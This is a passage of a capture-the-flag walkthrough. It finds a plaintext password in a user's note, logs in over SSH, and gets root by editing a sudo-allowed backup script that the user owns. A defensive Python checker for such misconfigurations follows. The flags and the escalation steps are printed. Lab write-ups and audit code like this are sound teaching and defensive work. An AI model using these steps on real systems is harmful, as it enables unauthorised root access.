drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Packages/User
drwx------ root   root          0 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local
-rw-r--r-- root   root       5199 Mon, 2020-12-28 16:38:24 home/alex/.config/sublime-text-3/Local/Auto Save Session.sublime_session
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Lib/python3.3
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/sublime-text-3/Installed Packages
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus
drwx------ root   root          0 Mon, 2020-12-28 16:33:49 home/alex/.config/ibus/bus
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 13:55:52 home/alex/Documents
-rw-r--r-- root   root        110 Tue, 2020-12-29 13:55:41 home/alex/Documents/note.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 17:59:30 home/alex/Public
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 17:59:37 home/alex/Videos
drwxrwxr-x alex   alex          0 Tue, 2020-12-29 13:57:14 home/alex/Desktop
-rw-r--r-- root   root         71 Tue, 2020-12-29 13:57:14 home/alex/Desktop/secret.txt
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 17:59:57 home/alex/Downloads
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:00:02 home/alex/Templates
drwxrwxr-x alex   alex          0 Mon, 2020-12-28 18:26:44 home/alex/Pictures

Let's extract these files!

In addition to field, we now have alex!

home/
└── alex
    ├── Desktop
    │   └── secret.txt
    ├── Documents
    │   └── note.txt
    ├── Downloads
    ├── Music
    ├── Pictures
    ├── Public
    ├── Templates
    └── Videos

We have 2 interesting files: secret.txt and note.txt

root@ip-10-10-91-98:~# cat home/alex/Desktop/secret.txt 
shoutout to all the people who have gotten to this stage whoop whoop!"
root@ip-10-10-91-98:~# cat home/alex/Documents/note.txt 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

We obtain Alex's password.

Let's connect over SSH!

root@ip-10-10-91-98:~# ssh alex@10.10.25.160
The authenticity of host '10.10.25.160 (10.10.25.160)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.25.160' (ECDSA) to the list of known hosts.
alex@10.10.25.160's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$ 

All that remains is to read the user.txt flag.

alex@ubuntu:~$ ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt
alex@ubuntu:~$ cat user.txt
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
alex@ubuntu:~$ 

Last but not least: the root.txt flag

Let's first look at Alex's privileges…

alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

Alex can run the backup.sh script with sudo, but the file's permissions do not let him modify it.

alex@ubuntu:~$ ls -lh /etc/mp3backups/backup.sh 
-r-xr-xr-- 1 alex alex 1.1K Dec 30  2020 /etc/mp3backups/backup.sh

We edit the file and add /bin/bash at the beginning of it.

Then we run the command!

alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh 
root@ubuntu:~# 

We have root privileges!

root@ubuntu:~# cd /root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt 
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
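
The misconfiguration behind this last step, seen from the defender's side, as an added example that is not part of the original write-up: a Python check that parses `sudo -l` output and reports sudo-allowed files that a non-root account can alter. The `sysroot` and `trusted_uids` parameters, the function names and the sample tree are assumptions for illustration, and the parent-directory check goes beyond what the page shows.

```python
import os
import re
import stat
import tempfile

# One command entry of `sudo -l`, e.g. "    (ALL : ALL) NOPASSWD: /path/to/cmd".
# Only the first command of an entry is considered.
SUDO_L_ENTRY = re.compile(
    r"^\s+\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S+)"
)
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH

# The relevant lines of the `sudo -l` output shown in this write-up.
SAMPLE_SUDO_L = (
    "User alex may run the following commands on ubuntu:\n"
    "    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh\n"
)


def parse_sudo_l(text):
    """Extract (runas, nopasswd, command_path) tuples from `sudo -l` output."""
    entries = []
    for line in text.splitlines():
        m = SUDO_L_ENTRY.match(line)
        if m:
            nopasswd = "NOPASSWD:" in m.group("tags")
            entries.append((m.group("runas").strip(), nopasswd, m.group("cmd")))
    return entries


def audit_target(cmd, sysroot="/", trusted_uids=frozenset({0})):
    """Return the reasons why a sudo-allowed file can be altered by a non-trusted user."""
    reasons = []
    root = os.path.abspath(sysroot)
    path = os.path.join(root, cmd.lstrip("/"))
    st = os.stat(path)
    # The owner can always restore the write bit, so a read-only mode on a
    # file owned by the invoking user protects nothing.
    if st.st_uid not in trusted_uids:
        reasons.append("owner-untrusted")
    if st.st_mode & WRITABLE_BY_OTHERS:
        reasons.append("group-or-world-writable")
    # A directory that is writable or owned by someone else lets the file be replaced.
    parent = os.path.dirname(path)
    while True:
        pst = os.stat(parent)
        if pst.st_uid not in trusted_uids or pst.st_mode & WRITABLE_BY_OTHERS:
            reasons.append("parent-dir-replaceable")
            break
        if parent == root or parent == os.path.dirname(parent):
            break
        parent = os.path.dirname(parent)
    return reasons


def audit_sudo_l(text, sysroot="/", trusted_uids=frozenset({0})):
    """Map every command found in `sudo -l` output to its list of findings."""
    return {cmd: audit_target(cmd, sysroot, trusted_uids)
            for _runas, _nopasswd, cmd in parse_sudo_l(text)}


def build_sample_sysroot():
    """Constructed tree holding backup.sh with the mode shown above (-r-xr-xr--)."""
    root = tempfile.mkdtemp(prefix="sysroot-")
    for sub in ("etc", os.path.join("etc", "mp3backups")):
        os.mkdir(os.path.join(root, sub))
        os.chmod(os.path.join(root, sub), 0o755)
    script = os.path.join(root, "etc", "mp3backups", "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(script, 0o554)
    return root


if __name__ == "__main__":
    sysroot = build_sample_sysroot()
    # Offline stand-in: any uid other than ours plays "root", so the current
    # user plays alex, the non-root owner of the script.
    not_us = frozenset({os.getuid() + 1})
    for cmd, reasons in audit_sudo_l(SAMPLE_SUDO_L, sysroot, not_us).items():
        print(cmd, "->", ", ".join(reasons) or "ok")
```

On a real host, call `audit_sudo_l` with the defaults (`sysroot="/"`, root as the only trusted uid); any non-empty result means the sudoers entry hands root to whoever controls that file.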

Summary